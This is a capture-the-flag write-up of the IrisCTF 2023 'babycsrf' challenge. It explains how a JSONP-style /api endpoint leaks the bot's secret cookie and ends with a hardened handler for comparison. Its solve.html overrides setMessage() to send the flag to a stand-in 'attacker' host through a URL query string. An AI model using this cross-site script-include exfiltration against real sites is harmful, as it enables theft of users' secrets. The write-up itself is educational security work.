IrisCTF 2023-web-babycsrf

yoobi · January 26, 2023


  • CSRF
  • JSONP vulnerability

Given info

  • and were given
  • and an Autobot was given; the bot will visit the URL we submit
from flask import Flask, request

app = Flask(__name__)

with open("home.html") as home:
    HOME_PAGE = home.read()

@app.route("/")          # route path assumed; it is not shown in the original listing
def home():
    return HOME_PAGE

@app.route("/api")       # the script that home.html loads
def page():
    # The secret comes from the visitor's cookie and is returned as executable
    # JavaScript (JSONP-style), so any page that includes /api with <script src>
    # receives the bot's secret.
    secret = request.cookies.get("secret", "EXAMPLEFLAG")
    return f"setMessage('irisctf{{{secret}}}');"
  • The flag is the value of the autobot's "secret" cookie
<!DOCTYPE html>
<html>
    <body>
        <h4>Welcome to my home page!</h4>
        Message of the day: <span id="message">(loading...)</span>
        <script>
window.setMessage = (m) => {
    document.getElementById("message").innerText = m;
};
window.onload = () => {
    s = document.createElement("script");
    s.src = "/api";
    document.body.appendChild(s);   // loads /api, which calls setMessage()
};
        </script>
    </body>
</html>
  • The /api script calls setMessage(), which writes the flag value into the page as the message


  1. Make a malicious web page to get the FLAG
  2. The FLAG is in 's source code, which means we should use CSRF
  • , solve.html were given, so we can build a malicious service from them.

Make the malicious solve.html file

  • The /api service responds with setMessage('irisctf{{{secret}}}'); (the f-string in the source, so the flag is inlined)

  • So we redefine the setMessage() function to capture the FLAG

<!DOCTYPE html>
<html>
	<script>
		function setMessage(m){
			location.href = "http://attacker/time?secret="+m;
		}
	</script>
	<!-- the challenge's /api endpoint -->
	<script src=""></script>
</html>
  • The redefined setMessage() runs when /api loads and sets location.href with the FLAG in the query string
  • The attacker's server then receives the FLAG
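As an added example that is not part of this writeup or the challenge's code: the JSONP-style /api handler described above beside a hardened version, written as plain WSGI callables so it runs with the standard library only. The cookie name "secret" and the irisctf{...} format come from the challenge; the X-Requested-With convention, the 403 response and the driver function are assumptions of this example.

```python
import json
from http.cookies import SimpleCookie


def _cookie(environ, name, default):
    """Read one cookie from the WSGI environ (like request.cookies.get)."""
    jar = SimpleCookie(environ.get("HTTP_COOKIE", ""))
    return jar[name].value if name in jar else default


def vulnerable_api(environ, start_response):
    """Mirrors the challenge's /api: the secret is embedded in executable JS,
    so any origin can load it with <script src> and supply its own setMessage()."""
    secret = _cookie(environ, "secret", "EXAMPLEFLAG")
    start_response("200 OK", [("Content-Type", "text/javascript")])
    return [f"setMessage('irisctf{{{secret}}}');".encode()]


def hardened_api(environ, start_response):
    """Same data, but unusable by a cross-site <script> include: a JSON body
    (a syntax error as a script), nosniff so browsers never run it as one, and
    a custom request header that only a same-origin fetch() can send without a
    CORS preflight (header name and value are this example's convention)."""
    if environ.get("HTTP_X_REQUESTED_WITH") != "fetch":
        start_response("403 Forbidden", [("Content-Type", "application/json")])
        return [b'{"error": "same-origin fetch required"}']
    secret = _cookie(environ, "secret", "EXAMPLEFLAG")
    body = json.dumps({"message": f"irisctf{{{secret}}}"}).encode()
    start_response("200 OK", [("Content-Type", "application/json"),
                              ("X-Content-Type-Options", "nosniff")])
    return [body]


def secret_cookie_header(value):
    """Set-Cookie value for the bot's secret: SameSite=Strict keeps the cookie
    off requests that an attacker-controlled page triggers (the <script src>
    load in solve.html), HttpOnly keeps it away from page scripts."""
    return f"secret={value}; HttpOnly; Secure; SameSite=Strict; Path=/"


def call(app, headers=None):
    """Minimal WSGI driver: returns (status, header dict, body text)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": "/api"}
    environ.update(headers or {})   # constructed request headers, e.g. HTTP_COOKIE
    captured = {}

    def start_response(status, response_headers):
        captured["status"], captured["headers"] = status, dict(response_headers)

    body = b"".join(app(environ, start_response)).decode()
    return captured["status"], captured["headers"], body
```

Running call(vulnerable_api, {"HTTP_COOKIE": "secret=demo"}) returns the executable setMessage('irisctf{demo}'); line, while the hardened handler refuses the same request with 403 and only returns JSON to a same-origin fetch that sets the header.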

this is yoobi
